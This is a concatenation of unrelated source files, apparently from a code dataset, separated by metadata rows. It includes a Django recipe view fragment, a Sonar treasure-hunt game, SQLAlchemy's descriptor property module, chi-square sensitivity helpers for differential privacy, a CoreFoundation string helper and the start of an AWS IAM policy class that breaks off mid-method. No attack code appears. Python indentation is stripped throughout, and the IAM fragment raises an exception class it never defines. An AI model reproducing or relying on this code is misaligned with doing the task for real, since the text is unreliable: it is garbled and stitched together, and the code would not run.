main_recipes_table = recipe_name_taste_table.filter(category__iexact="main")
entree_recipes_table = recipe_name_taste_table.filter(category__iexact="entree")
return render(request, 'search_results.html',
{'main_recipes_table': main_recipes_table, 'entree_recipes_table': entree_recipes_table,'query': search_list, 'request_temp': request_temp, 'checks_list': checks_list})
def get_full_recipe(request,recipe_name_arg):
recipe_name_list = RecipeList.objects.filter(recipe_name=recipe_name_arg)
recipe_ingredients_list = RecipeIngredient.objects.filter(recipe_name=recipe_name_arg)
recipe_content = RecipeContent2.objects.filter(recipe_name=recipe_name_arg)
#html = "<html><body>Recipe is : %s </body></html>" % recipe_name
#return HttpResponse(html)
return render(request, 'get_full_recipe.html', {'recipe_name_list': recipe_name_list,'recipe_ingredients_list' : recipe_ingredients_list, 'recipe_content': recipe_content}) | mit | -8,943,540,473,010,711,000 | 35.37018 | 180 | 0.581466 | false |
kallimachos/archive | games/sonar.py | 1 | 6342 | # Sonar
import random
import sys
def drawBoard(board):
# Draw the board data structure.
hline = ' ' # initial space for the numbers down the left side of the board
for i in range(1, 6):
hline += (' ' * 9) + str(i)
# print the numbers across the top
print(hline)
print(' ' + ('0123456789' * 6))
print()
# print each of the 15 rows
for i in range(15):
# single-digit numbers need to be padded with an extra space
if i < 10:
extraSpace = ' '
else:
extraSpace = ''
print('%s%s %s %s' % (extraSpace, i, getRow(board, i), i))
# print the numbers across the bottom
print()
print(' ' + ('0123456789' * 6))
print(hline)
def getRow(board, row):
# Return a string from the board data structure at a certain row.
boardRow = ''
for i in range(60):
boardRow += board[i][row]
return boardRow
def getNewBoard():
# Create a new 60x15 board data structure.
board = []
for x in range(60): # the main list is a list of 60 lists
board.append([])
for y in range(15): # each list in the main list has 15 single-character strings
# use different characters for the ocean to make it more readable.
if random.randint(0, 1) == 0:
board[x].append('~')
else:
board[x].append('`')
return board
def getRandomChests(numChests):
# Create a list of chest data structures (two-item lists of x, y int coordinates)
chests = []
for i in range(numChests):
chests.append([random.randint(0, 59), random.randint(0, 14)])
return chests
def isValidMove(x, y):
# Return True if the coordinates are on the board, otherwise False.
return x >= 0 and x <= 59 and y >= 0 and y <= 14
def makeMove(board, chests, x, y):
# Change the board data structure with a sonar device character. Remove treasure chests
# from the chests list as they are found. Return False if this is an invalid move.
# Otherwise, return the string of the result of this move.
if not isValidMove(x, y):
return False
smallestDistance = 100 # any chest will be closer than 100.
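    # The distance to each chest is the Chebyshev distance: the larger of the
    # horizontal and vertical offsets between the sonar device and that chest.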
for cx, cy in chests:
if abs(cx - x) > abs(cy - y):
distance = abs(cx - x)
else:
distance = abs(cy - y)
if distance < smallestDistance: # we want the closest treasure chest.
smallestDistance = distance
if smallestDistance == 0:
# xy is directly on a treasure chest!
chests.remove([x, y])
return 'You have found a sunken treasure chest!'
else:
if smallestDistance < 10:
board[x][y] = str(smallestDistance)
return 'Treasure detected at a distance of %s from the sonar device.' % (smallestDistance)
else:
board[x][y] = 'O'
return 'Sonar did not detect anything. All treasure chests out of range.'
def enterPlayerMove():
# Let the player type in her move. Return a two-item list of int xy coordinates.
print('Where do you want to drop the next sonar device? (0-59 0-14) (or type quit)')
while True:
move = raw_input()
if move.lower() == 'quit':
print('Thanks for playing!')
sys.exit()
move = move.split()
if len(move) == 2 and move[0].isdigit() and move[1].isdigit() and isValidMove(int(move[0]), int(move[1])):
return [int(move[0]), int(move[1])]
print('Enter a number from 0 to 59, a space, then a number from 0 to 14.')
def playAgain():
# This function returns True if the player wants to play again, otherwise it returns False.
print('Do you want to play again? (yes or no)')
return raw_input().lower().startswith('y')
def showInstructions():
print('''Instructions:
You are the captain of the Simon, a treasure-hunting ship. Your current mission
is to find the three sunken treasure chests that are lurking in the part of the
ocean you are in and collect them.
To play, enter the coordinates of the point in the ocean you wish to drop a
sonar device. The sonar can find out how far away the closest chest is to it.
For example, the d below marks where the device was dropped, and the 2's
represent distances of 2 away from the device. The 4's represent
distances of 4 away from the device.
444444444
4 4
4 22222 4
4 2 2 4
4 2 d 2 4
4 2 2 4
4 22222 4
4 4
444444444
Press enter to continue...''')
raw_input()
print('''For example, here is a treasure chest (the c) located a distance of 2 away
from the sonar device (the d):
22222
c 2
2 d 2
2 2
22222
The point where the device was dropped will be marked with a d.
The treasure chests don't move around. Sonar devices can detect treasure
chests up to a distance of 9. If all chests are out of range, the point
will be marked with an O.
If a device is directly dropped on a treasure chest, you have discovered
the location of the chest, and it will be collected. The sonar device will
remain there.
When you collect a chest, all sonar devices will update to locate the next
closest sunken treasure chest.
Press enter to continue...''')
raw_input()
print('')
print('S O N A R !')
print('')
print('Would you like to view the instructions? (yes/no)')
if raw_input().lower().startswith('y'):
showInstructions()
while True:
# game setup
sonarDevices = 16
theBoard = getNewBoard()
theChests = getRandomChests(3)
drawBoard(theBoard)
previousMoves = []
while sonarDevices > 0:
# Start of a turn:
# show sonar device/chest status
if sonarDevices > 1: extraSsonar = 's'
else: extraSsonar = ''
if len(theChests) > 1: extraSchest = 's'
else: extraSchest = ''
print('You have %s sonar device%s left. %s treasure chest%s remaining.' % (sonarDevices, extraSsonar, len(theChests), extraSchest))
x, y = enterPlayerMove()
previousMoves.append([x, y]) # we must track all moves so that sonar devices can be updated.
moveResult = makeMove(theBoard, theChests, x, y)
if moveResult == False:
continue
else:
if moveResult == 'You have found a sunken treasure chest!':
# update all the sonar devices currently on the map.
for x, y in previousMoves:
makeMove(theBoard, theChests, x, y)
drawBoard(theBoard)
print(moveResult)
if len(theChests) == 0:
print('You have found all the sunken treasure chests! Congratulations and good game!')
break
sonarDevices -= 1
if sonarDevices == 0:
print('We\'ve run out of sonar devices! Now we have to turn the ship around and head')
print('for home with treasure chests still out there! Game over.')
print(' The remaining chests were here:')
for x, y in theChests:
print(' %s, %s' % (x, y))
if not playAgain():
sys.exit()
| gpl-3.0 | -1,569,769,953,806,892,800 | 35.034091 | 133 | 0.694734 | false |
fernandog/Medusa | ext/sqlalchemy/orm/descriptor_props.py | 1 | 27751 | # orm/descriptor_props.py
# Copyright (C) 2005-2018 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Descriptor properties are more "auxiliary" properties
that exist as configurational elements, but don't participate
as actively in the load/persist ORM loop.
"""
from .interfaces import MapperProperty, PropComparator
from .util import _none_set
from . import attributes
from .. import util, sql, exc as sa_exc, event, schema
from ..sql import expression
from . import properties
from . import query
class DescriptorProperty(MapperProperty):
""":class:`.MapperProperty` which proxies access to a
user-defined descriptor."""
doc = None
def instrument_class(self, mapper):
prop = self
class _ProxyImpl(object):
accepts_scalar_loader = False
expire_missing = True
collection = False
def __init__(self, key):
self.key = key
if hasattr(prop, 'get_history'):
def get_history(self, state, dict_,
passive=attributes.PASSIVE_OFF):
return prop.get_history(state, dict_, passive)
if self.descriptor is None:
desc = getattr(mapper.class_, self.key, None)
if mapper._is_userland_descriptor(desc):
self.descriptor = desc
if self.descriptor is None:
def fset(obj, value):
setattr(obj, self.name, value)
def fdel(obj):
delattr(obj, self.name)
def fget(obj):
return getattr(obj, self.name)
self.descriptor = property(
fget=fget,
fset=fset,
fdel=fdel,
)
proxy_attr = attributes.create_proxied_attribute(
self.descriptor)(
self.parent.class_,
self.key,
self.descriptor,
lambda: self._comparator_factory(mapper),
doc=self.doc,
original_property=self
)
proxy_attr.impl = _ProxyImpl(self.key)
mapper.class_manager.instrument_attribute(self.key, proxy_attr)
@util.langhelpers.dependency_for("sqlalchemy.orm.properties")
class CompositeProperty(DescriptorProperty):
"""Defines a "composite" mapped attribute, representing a collection
of columns as one attribute.
:class:`.CompositeProperty` is constructed using the :func:`.composite`
function.
.. seealso::
:ref:`mapper_composite`
"""
def __init__(self, class_, *attrs, **kwargs):
r"""Return a composite column-based property for use with a Mapper.
See the mapping documentation section :ref:`mapper_composite` for a
full usage example.
The :class:`.MapperProperty` returned by :func:`.composite`
is the :class:`.CompositeProperty`.
:param class\_:
The "composite type" class.
:param \*cols:
List of Column objects to be mapped.
:param active_history=False:
When ``True``, indicates that the "previous" value for a
scalar attribute should be loaded when replaced, if not
already loaded. See the same flag on :func:`.column_property`.
.. versionchanged:: 0.7
This flag specifically becomes meaningful
- previously it was a placeholder.
:param group:
A group name for this property when marked as deferred.
:param deferred:
When True, the column property is "deferred", meaning that it does
not load immediately, and is instead loaded when the attribute is
first accessed on an instance. See also
:func:`~sqlalchemy.orm.deferred`.
:param comparator_factory: a class which extends
:class:`.CompositeProperty.Comparator` which provides custom SQL
clause generation for comparison operations.
:param doc:
optional string that will be applied as the doc on the
class-bound descriptor.
:param info: Optional data dictionary which will be populated into the
:attr:`.MapperProperty.info` attribute of this object.
.. versionadded:: 0.8
:param extension:
an :class:`.AttributeExtension` instance,
or list of extensions, which will be prepended to the list of
attribute listeners for the resulting descriptor placed on the
class. **Deprecated.** Please see :class:`.AttributeEvents`.
"""
super(CompositeProperty, self).__init__()
self.attrs = attrs
self.composite_class = class_
self.active_history = kwargs.get('active_history', False)
self.deferred = kwargs.get('deferred', False)
self.group = kwargs.get('group', None)
self.comparator_factory = kwargs.pop('comparator_factory',
self.__class__.Comparator)
if 'info' in kwargs:
self.info = kwargs.pop('info')
util.set_creation_order(self)
self._create_descriptor()
def instrument_class(self, mapper):
super(CompositeProperty, self).instrument_class(mapper)
self._setup_event_handlers()
def do_init(self):
"""Initialization which occurs after the :class:`.CompositeProperty`
has been associated with its parent mapper.
"""
self._setup_arguments_on_columns()
def _create_descriptor(self):
"""Create the Python descriptor that will serve as
the access point on instances of the mapped class.
"""
def fget(instance):
dict_ = attributes.instance_dict(instance)
state = attributes.instance_state(instance)
if self.key not in dict_:
# key not present. Iterate through related
# attributes, retrieve their values. This
# ensures they all load.
values = [
getattr(instance, key)
for key in self._attribute_keys
]
# current expected behavior here is that the composite is
# created on access if the object is persistent or if
# col attributes have non-None. This would be better
# if the composite were created unconditionally,
# but that would be a behavioral change.
if self.key not in dict_ and (
state.key is not None or
not _none_set.issuperset(values)
):
dict_[self.key] = self.composite_class(*values)
state.manager.dispatch.refresh(state, None, [self.key])
return dict_.get(self.key, None)
def fset(instance, value):
dict_ = attributes.instance_dict(instance)
state = attributes.instance_state(instance)
attr = state.manager[self.key]
previous = dict_.get(self.key, attributes.NO_VALUE)
for fn in attr.dispatch.set:
value = fn(state, value, previous, attr.impl)
dict_[self.key] = value
if value is None:
for key in self._attribute_keys:
setattr(instance, key, None)
else:
for key, value in zip(
self._attribute_keys,
value.__composite_values__()):
setattr(instance, key, value)
def fdel(instance):
state = attributes.instance_state(instance)
dict_ = attributes.instance_dict(instance)
previous = dict_.pop(self.key, attributes.NO_VALUE)
attr = state.manager[self.key]
attr.dispatch.remove(state, previous, attr.impl)
for key in self._attribute_keys:
setattr(instance, key, None)
self.descriptor = property(fget, fset, fdel)
@util.memoized_property
def _comparable_elements(self):
return [
getattr(self.parent.class_, prop.key)
for prop in self.props
]
@util.memoized_property
def props(self):
props = []
for attr in self.attrs:
if isinstance(attr, str):
prop = self.parent.get_property(
attr, _configure_mappers=False)
elif isinstance(attr, schema.Column):
prop = self.parent._columntoproperty[attr]
elif isinstance(attr, attributes.InstrumentedAttribute):
prop = attr.property
else:
raise sa_exc.ArgumentError(
"Composite expects Column objects or mapped "
"attributes/attribute names as arguments, got: %r"
% (attr,))
props.append(prop)
return props
@property
def columns(self):
return [a for a in self.attrs if isinstance(a, schema.Column)]
def _setup_arguments_on_columns(self):
"""Propagate configuration arguments made on this composite
to the target columns, for those that apply.
"""
for prop in self.props:
prop.active_history = self.active_history
if self.deferred:
prop.deferred = self.deferred
prop.strategy_key = (
("deferred", True),
("instrument", True))
prop.group = self.group
def _setup_event_handlers(self):
"""Establish events that populate/expire the composite attribute."""
def load_handler(state, *args):
_load_refresh_handler(state, args, is_refresh=False)
def refresh_handler(state, *args):
_load_refresh_handler(state, args, is_refresh=True)
def _load_refresh_handler(state, args, is_refresh):
dict_ = state.dict
if not is_refresh and self.key in dict_:
return
# if column elements aren't loaded, skip.
# __get__() will initiate a load for those
# columns
for k in self._attribute_keys:
if k not in dict_:
return
dict_[self.key] = self.composite_class(
*[state.dict[key] for key in
self._attribute_keys]
)
def expire_handler(state, keys):
if keys is None or set(self._attribute_keys).intersection(keys):
state.dict.pop(self.key, None)
def insert_update_handler(mapper, connection, state):
"""After an insert or update, some columns may be expired due
to server side defaults, or re-populated due to client side
defaults. Pop out the composite value here so that it
recreates.
"""
state.dict.pop(self.key, None)
event.listen(self.parent, 'after_insert',
insert_update_handler, raw=True)
event.listen(self.parent, 'after_update',
insert_update_handler, raw=True)
event.listen(self.parent, 'load',
load_handler, raw=True, propagate=True)
event.listen(self.parent, 'refresh',
refresh_handler, raw=True, propagate=True)
event.listen(self.parent, 'expire',
expire_handler, raw=True, propagate=True)
# TODO: need a deserialize hook here
@util.memoized_property
def _attribute_keys(self):
return [
prop.key for prop in self.props
]
def get_history(self, state, dict_, passive=attributes.PASSIVE_OFF):
"""Provided for userland code that uses attributes.get_history()."""
added = []
deleted = []
has_history = False
for prop in self.props:
key = prop.key
hist = state.manager[key].impl.get_history(state, dict_)
if hist.has_changes():
has_history = True
non_deleted = hist.non_deleted()
if non_deleted:
added.extend(non_deleted)
else:
added.append(None)
if hist.deleted:
deleted.extend(hist.deleted)
else:
deleted.append(None)
if has_history:
return attributes.History(
[self.composite_class(*added)],
(),
[self.composite_class(*deleted)]
)
else:
return attributes.History(
(), [self.composite_class(*added)], ()
)
def _comparator_factory(self, mapper):
return self.comparator_factory(self, mapper)
class CompositeBundle(query.Bundle):
def __init__(self, property, expr):
self.property = property
super(CompositeProperty.CompositeBundle, self).__init__(
property.key, *expr)
def create_row_processor(self, query, procs, labels):
def proc(row):
return self.property.composite_class(
*[proc(row) for proc in procs])
return proc
class Comparator(PropComparator):
"""Produce boolean, comparison, and other operators for
:class:`.CompositeProperty` attributes.
See the example in :ref:`composite_operations` for an overview
        of usage, as well as the documentation for :class:`.PropComparator`.
See also:
:class:`.PropComparator`
:class:`.ColumnOperators`
:ref:`types_operators`
:attr:`.TypeEngine.comparator_factory`
"""
__hash__ = None
@property
def clauses(self):
return self.__clause_element__()
def __clause_element__(self):
return expression.ClauseList(
group=False, *self._comparable_elements)
def _query_clause_element(self):
return CompositeProperty.CompositeBundle(
self.prop, self.__clause_element__())
def _bulk_update_tuples(self, value):
if value is None:
values = [None for key in self.prop._attribute_keys]
elif isinstance(value, self.prop.composite_class):
values = value.__composite_values__()
else:
raise sa_exc.ArgumentError(
"Can't UPDATE composite attribute %s to %r" %
(self.prop, value))
return zip(
self._comparable_elements,
values
)
@util.memoized_property
def _comparable_elements(self):
if self._adapt_to_entity:
return [
getattr(
self._adapt_to_entity.entity,
prop.key
) for prop in self.prop._comparable_elements
]
else:
return self.prop._comparable_elements
def __eq__(self, other):
if other is None:
values = [None] * len(self.prop._comparable_elements)
else:
values = other.__composite_values__()
comparisons = [
a == b
for a, b in zip(self.prop._comparable_elements, values)
]
if self._adapt_to_entity:
comparisons = [self.adapter(x) for x in comparisons]
return sql.and_(*comparisons)
def __ne__(self, other):
return sql.not_(self.__eq__(other))
def __str__(self):
return str(self.parent.class_.__name__) + "." + self.key
@util.langhelpers.dependency_for("sqlalchemy.orm.properties")
class ConcreteInheritedProperty(DescriptorProperty):
"""A 'do nothing' :class:`.MapperProperty` that disables
an attribute on a concrete subclass that is only present
on the inherited mapper, not the concrete classes' mapper.
Cases where this occurs include:
* When the superclass mapper is mapped against a
"polymorphic union", which includes all attributes from
all subclasses.
* When a relationship() is configured on an inherited mapper,
but not on the subclass mapper. Concrete mappers require
that relationship() is configured explicitly on each
subclass.
"""
def _comparator_factory(self, mapper):
comparator_callable = None
for m in self.parent.iterate_to_root():
p = m._props[self.key]
if not isinstance(p, ConcreteInheritedProperty):
comparator_callable = p.comparator_factory
break
return comparator_callable
def __init__(self):
super(ConcreteInheritedProperty, self).__init__()
def warn():
raise AttributeError("Concrete %s does not implement "
"attribute %r at the instance level. Add "
"this property explicitly to %s." %
(self.parent, self.key, self.parent))
class NoninheritedConcreteProp(object):
def __set__(s, obj, value):
warn()
def __delete__(s, obj):
warn()
def __get__(s, obj, owner):
if obj is None:
return self.descriptor
warn()
self.descriptor = NoninheritedConcreteProp()
@util.langhelpers.dependency_for("sqlalchemy.orm.properties")
class SynonymProperty(DescriptorProperty):
def __init__(self, name, map_column=None,
descriptor=None, comparator_factory=None,
doc=None, info=None):
"""Denote an attribute name as a synonym to a mapped property,
in that the attribute will mirror the value and expression behavior
of another attribute.
e.g.::
class MyClass(Base):
__tablename__ = 'my_table'
id = Column(Integer, primary_key=True)
job_status = Column(String(50))
status = synonym("job_status")
:param name: the name of the existing mapped property. This
can refer to the string name ORM-mapped attribute
configured on the class, including column-bound attributes
and relationships.
:param descriptor: a Python :term:`descriptor` that will be used
as a getter (and potentially a setter) when this attribute is
accessed at the instance level.
:param map_column: **For classical mappings and mappings against
an existing Table object only**. if ``True``, the :func:`.synonym`
construct will locate the :class:`.Column` object upon the mapped
table that would normally be associated with the attribute name of
this synonym, and produce a new :class:`.ColumnProperty` that instead
maps this :class:`.Column` to the alternate name given as the "name"
argument of the synonym; in this way, the usual step of redefining
the mapping of the :class:`.Column` to be under a different name is
unnecessary. This is usually intended to be used when a
:class:`.Column` is to be replaced with an attribute that also uses a
descriptor, that is, in conjunction with the
:paramref:`.synonym.descriptor` parameter::
my_table = Table(
"my_table", metadata,
Column('id', Integer, primary_key=True),
Column('job_status', String(50))
)
class MyClass(object):
@property
def _job_status_descriptor(self):
return "Status: %s" % self._job_status
mapper(
MyClass, my_table, properties={
"job_status": synonym(
"_job_status", map_column=True,
descriptor=MyClass._job_status_descriptor)
}
)
Above, the attribute named ``_job_status`` is automatically
mapped to the ``job_status`` column::
>>> j1 = MyClass()
>>> j1._job_status = "employed"
>>> j1.job_status
Status: employed
When using Declarative, in order to provide a descriptor in
conjunction with a synonym, use the
:func:`sqlalchemy.ext.declarative.synonym_for` helper. However,
note that the :ref:`hybrid properties <mapper_hybrids>` feature
should usually be preferred, particularly when redefining attribute
behavior.
:param info: Optional data dictionary which will be populated into the
:attr:`.InspectionAttr.info` attribute of this object.
.. versionadded:: 1.0.0
:param comparator_factory: A subclass of :class:`.PropComparator`
that will provide custom comparison behavior at the SQL expression
level.
.. note::
For the use case of providing an attribute which redefines both
Python-level and SQL-expression level behavior of an attribute,
please refer to the Hybrid attribute introduced at
:ref:`mapper_hybrids` for a more effective technique.
.. seealso::
:ref:`synonyms` - Overview of synonyms
:func:`.synonym_for` - a helper oriented towards Declarative
:ref:`mapper_hybrids` - The Hybrid Attribute extension provides an
updated approach to augmenting attribute behavior more flexibly
than can be achieved with synonyms.
"""
super(SynonymProperty, self).__init__()
self.name = name
self.map_column = map_column
self.descriptor = descriptor
self.comparator_factory = comparator_factory
self.doc = doc or (descriptor and descriptor.__doc__) or None
if info:
self.info = info
util.set_creation_order(self)
# TODO: when initialized, check _proxied_property,
# emit a warning if its not a column-based property
@util.memoized_property
def _proxied_property(self):
attr = getattr(self.parent.class_, self.name)
if not hasattr(attr, 'property') or not \
isinstance(attr.property, MapperProperty):
raise sa_exc.InvalidRequestError(
"""synonym() attribute "%s.%s" only supports """
"""ORM mapped attributes, got %r""" % (
self.parent.class_.__name__,
self.name,
attr
)
)
return attr.property
def _comparator_factory(self, mapper):
prop = self._proxied_property
if self.comparator_factory:
comp = self.comparator_factory(prop, mapper)
else:
comp = prop.comparator_factory(prop, mapper)
return comp
def set_parent(self, parent, init):
if self.map_column:
# implement the 'map_column' option.
if self.key not in parent.mapped_table.c:
raise sa_exc.ArgumentError(
"Can't compile synonym '%s': no column on table "
"'%s' named '%s'"
% (self.name, parent.mapped_table.description, self.key))
elif parent.mapped_table.c[self.key] in \
parent._columntoproperty and \
parent._columntoproperty[
parent.mapped_table.c[self.key]
].key == self.name:
raise sa_exc.ArgumentError(
"Can't call map_column=True for synonym %r=%r, "
"a ColumnProperty already exists keyed to the name "
"%r for column %r" %
(self.key, self.name, self.name, self.key)
)
p = properties.ColumnProperty(parent.mapped_table.c[self.key])
parent._configure_property(
self.name, p,
init=init,
setparent=True)
p._mapped_by_synonym = self.key
self.parent = parent
@util.langhelpers.dependency_for("sqlalchemy.orm.properties")
class ComparableProperty(DescriptorProperty):
"""Instruments a Python property for use in query expressions."""
def __init__(
self, comparator_factory, descriptor=None, doc=None, info=None):
"""Provides a method of applying a :class:`.PropComparator`
to any Python descriptor attribute.
.. versionchanged:: 0.7
:func:`.comparable_property` is superseded by
the :mod:`~sqlalchemy.ext.hybrid` extension. See the example
at :ref:`hybrid_custom_comparators`.
Allows any Python descriptor to behave like a SQL-enabled
attribute when used at the class level in queries, allowing
redefinition of expression operator behavior.
In the example below we redefine :meth:`.PropComparator.operate`
to wrap both sides of an expression in ``func.lower()`` to produce
case-insensitive comparison::
from sqlalchemy.orm import comparable_property
from sqlalchemy.orm.interfaces import PropComparator
from sqlalchemy.sql import func
from sqlalchemy import Integer, String, Column
from sqlalchemy.ext.declarative import declarative_base
class CaseInsensitiveComparator(PropComparator):
def __clause_element__(self):
return self.prop
def operate(self, op, other):
return op(
func.lower(self.__clause_element__()),
func.lower(other)
)
Base = declarative_base()
class SearchWord(Base):
__tablename__ = 'search_word'
id = Column(Integer, primary_key=True)
word = Column(String)
word_insensitive = comparable_property(lambda prop, mapper:
CaseInsensitiveComparator(
mapper.c.word, mapper)
)
A mapping like the above allows the ``word_insensitive`` attribute
to render an expression like::
>>> print SearchWord.word_insensitive == "Trucks"
lower(search_word.word) = lower(:lower_1)
:param comparator_factory:
A PropComparator subclass or factory that defines operator behavior
for this property.
:param descriptor:
Optional when used in a ``properties={}`` declaration. The Python
descriptor or property to layer comparison behavior on top of.
The like-named descriptor will be automatically retrieved from the
mapped class if left blank in a ``properties`` declaration.
:param info: Optional data dictionary which will be populated into the
:attr:`.InspectionAttr.info` attribute of this object.
.. versionadded:: 1.0.0
"""
super(ComparableProperty, self).__init__()
self.descriptor = descriptor
self.comparator_factory = comparator_factory
self.doc = doc or (descriptor and descriptor.__doc__) or None
if info:
self.info = info
util.set_creation_order(self)
def _comparator_factory(self, mapper):
return self.comparator_factory(self, mapper)
| gpl-3.0 | 7,448,052,880,767,229,000 | 34.993515 | 79 | 0.569097 | false |
fy/compare_dp_mechanisms | notebooks/utility_functions.py | 1 | 3409 | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <markdowncell>
# Utility functions.
# <codecell>
import numpy as np
# <codecell>
def get_chisq_sensitivity(NN_case, NN_control):
"""sensitivity for the chi-square statistic based on 2x3 genotype tables"""
NN = NN_case + NN_control # total number of subjects
CC_max = max(NN_case, NN_control)
CC_min = min(NN_case, NN_control)
sensitivity = 1. * NN**2 / (CC_min * (CC_max + 1)) # sensitivity of chisq
return sensitivity
# <codecell>
def get_allelic_test_sensitivity(NN_case, NN_control):
"""sensitivity for the chi-square statistic based on 2x2 allelic tables derived from 2x3 genotype tables"""
def sensitivity_type_1(SS, RR):
NN = SS + RR
return 1.0 * 8 * NN**2 * SS / \
(RR * (2 * SS + 3) * (2 * SS + 1))
def sensitivity_type_2(SS, RR):
NN = SS + RR
return 1.0 * 4 * NN**2 * ((2 * RR**2 - 1) * (2 * SS - 1) - 1) / \
(SS * RR * (2 * RR + 1) * (2 * RR - 1) * (2 * SS + 1))
return np.max([sensitivity_type_1(NN_case, NN_control),
sensitivity_type_1(NN_control, NN_case),
sensitivity_type_2(NN_case, NN_control),
sensitivity_type_2(NN_control, NN_case)])
# <codecell>
def check_table_valid(input_table):
"""Make sure that the margins (row sums and column sums ) are all positive.
Args:
input_table: A 2x3 numpy matrix.
"""
## check zero margins
rowsum = np.array(map(np.sum, input_table))
colsum = np.array(map(np.sum, input_table.T))
if np.any(rowsum == 0) or np.any(colsum == 0):
return False
else:
return True
# <codecell>
def chisq_stat(input_table):
"""Calculate the Pearson's chi-square staitsitc.
Args:
input_table: A 2x3 numpy matrix.
Returns:
A tuple (chisquare_statistics, degree_of_freedom).
"""
input_table = input_table.astype(float)
rowsum = np.array(map(np.sum, input_table))
colsum = np.array(map(np.sum, input_table.T))
expected = np.outer(rowsum, colsum) / np.sum(rowsum)
# df = (len([1 for rr in rowsum if rr > 0]) - 1) * \
# (len([1 for cc in colsum if cc > 0]) - 1)
chisq = np.sum(np.array(input_table[expected > 0] -
expected[expected > 0]) ** 2 /
expected[expected > 0])
# return (chisq, df)
return chisq
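# <markdowncell>
# Illustrative example (added; not part of the original notebook): a toy 2x3
# genotype table with made-up counts, used to exercise check_table_valid and
# chisq_stat.
# <codecell>
example_table = np.matrix([[10., 20., 30.],
                           [15., 25., 20.]])  # rows: case/control; columns: genotypes
assert check_table_valid(example_table)
example_chisq = chisq_stat(example_table)  # Pearson's chi-square, roughly 3.56 here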
# <codecell>
def chisq_gradient(input_table):
"""Return the changable part of the gradient of the chi-square staitsitc.
Args:
input_table: A 2x3 numpy matrix.
Returns:
A four-element tuple consisting of the partial derivatives based on the
parametrization the chi-square statistic by (r0, r1, n0, n1). The
full parametrization would be
(r0, r1, r2, s0, s1, s2, n0, n1, n2), where ri + si = ni. The returned
value will be scaled down by N^2 / (R * S).
"""
input_table = input_table.astype(float)
colsum = np.array(map(np.sum, input_table.T))
## divide each cell by colsum
fraction_table = input_table / colsum
dy_dr0, dy_dr1 = [2 * fraction_table[0, ii] - 2 * fraction_table[0, 2] for
ii in [0, 1]]
dy_dn0, dy_dn1 = [-fraction_table[0, ii] ** 2 + fraction_table[0, 2] ** 2 for
ii in [0, 1]]
return (dy_dr0, dy_dr1, dy_dn0, dy_dn1)
| mit | 3,960,275,843,723,750,000 | 32.097087 | 111 | 0.576709 | false |
Flavsditz/projects | eyeTracking/pupil/pupil_src/shared_modules/uvc_capture/mac_video/cf_string.py | 1 | 2685 | '''
(*)~----------------------------------------------------------------------------------
Pupil - eye tracking platform
Copyright (C) 2012-2013 Moritz Kassner & William Patera
Distributed under the terms of the CC BY-NC-SA License.
License details are in the file license.txt, distributed as part of this software.
----------------------------------------------------------------------------------~(*)
'''
# Python string to/from CFString conversion helper functions:
from ctypes import *
from ctypes import util
cf = cdll.LoadLibrary(util.find_library('CoreFoundation'))
# Setup return types for functions that return pointers.
# (Otherwise ctypes returns 32-bit int which breaks on 64-bit systems.)
# Note that you must also wrap the return value with c_void_p before
# you use it as an argument to another function, otherwise ctypes will
# automatically convert it back to a 32-bit int again.
cf.CFDictionaryCreateMutable.restype = c_void_p
cf.CFStringCreateWithCString.restype = c_void_p
cf.CFAttributedStringCreate.restype = c_void_p
cf.CFDataCreate.restype = c_void_p
cf.CFNumberCreate.restype = c_void_p
# Core Foundation constants
kCFStringEncodingUTF8 = 0x08000100
kCFStringEncodingMacRoman = 0
kCFStringEncodingWindowsLatin1 = 0x0500
kCFStringEncodingISOLatin1 = 0x0201
kCFStringEncodingNextStepLatin = 0x0B01
kCFStringEncodingASCII = 0x0600
kCFStringEncodingUnicode = 0x0100
kCFStringEncodingUTF8 = 0x08000100
kCFStringEncodingNonLossyASCII = 0x0BFF
kCFStringEncodingUTF16 = 0x0100
kCFStringEncodingUTF16BE = 0x10000100
kCFStringEncodingUTF16LE = 0x14000100
kCFStringEncodingUTF32 = 0x0c000100
kCFStringEncodingUTF32BE = 0x18000100
kCFStringEncodingUTF32LE = 0x1c000100
kCFNumberSInt32Type = 3
def CFSTR(text):
return c_void_p(cf.CFStringCreateWithCString(None, text.encode('utf8'), kCFStringEncodingASCII))
def cfstring_to_string(cfstring):
length = cf.CFStringGetLength(cfstring)
size = cf.CFStringGetMaximumSizeForEncoding(length, kCFStringEncodingASCII)
buffer = c_buffer(size + 1)
result = cf.CFStringGetCString(cfstring, buffer, len(buffer), kCFStringEncodingASCII)
if result:
return buffer.value
def cfstring_to_string_release(cfstring):
length = cf.CFStringGetLength(cfstring)
size = cf.CFStringGetMaximumSizeForEncoding(length, kCFStringEncodingASCII)
buffer = c_buffer(size + 1)
result = cf.CFStringGetCString(cfstring, buffer, len(buffer), kCFStringEncodingASCII)
cf.CFRelease(cfstring)
if result:
return buffer.value
def release(cfstring):
cf.CFRelease(cfstring)
if __name__ == '__main__':
cf_pointer = CFSTR("THIS is a Test")
print cfstring_to_string(cf_pointer)
| gpl-2.0 | -7,743,753,104,019,920,000 | 35.283784 | 100 | 0.731844 | false |
1Strategy/security-fairy | aws_iam_policy.py | 1 | 5068 |
import logging
import json
import re
class InvalidStatementAction(Exception):
    """Raised for a malformed statement action or effect.
    Defined here because it is raised below but was never imported or defined."""
    pass
class IAMPolicy:
def __init__(self, logging_level = logging.DEBUG):
logging.basicConfig(level=logging_level)
self.statements = []
self.service_actions = {}
self.max_policy_size = {
'user' : 2048, # User policy size cannot exceed 2,048 characters
'role' : 10240, # Role policy size cannot exceed 10,240 characters
'group': 5120 # Group policy size cannot exceed 5,120 characters
}
def __add_statement__(self, statement):
if not isinstance(statement, IAMStatement):
raise Exception('This Method only supports objects of type IAMStatement')
self.statements.append(statement)
def add_actions(self, statement_actions):
for statement_action in statement_actions:
self.add_action(statement_action)
def add_action(self, statement_action):
split_statement_action = statement_action.split(':')
if len(split_statement_action) != 2:
            raise InvalidStatementAction('Invalid statement action: {action}. Must be of the form \'service:api-action\'.'.format(action=statement_action))
service = self.__get_service_alias__(split_statement_action[0])
if service == 'lambda':
# Checks for extraneous lambda api version information:
# e.g. lambda:ListTags20170331
# lambda:GetFunctionConfiguration20150331v2"
# lambda:"UpdateFunctionCode20150331v2"
api_version_info = re.findall(r"(\d+v\d+)|(\d+)", split_statement_action[1])
if api_version_info:
for api_version in api_version_info[0]:
logging.debug(api_version)
                    if api_version != '':
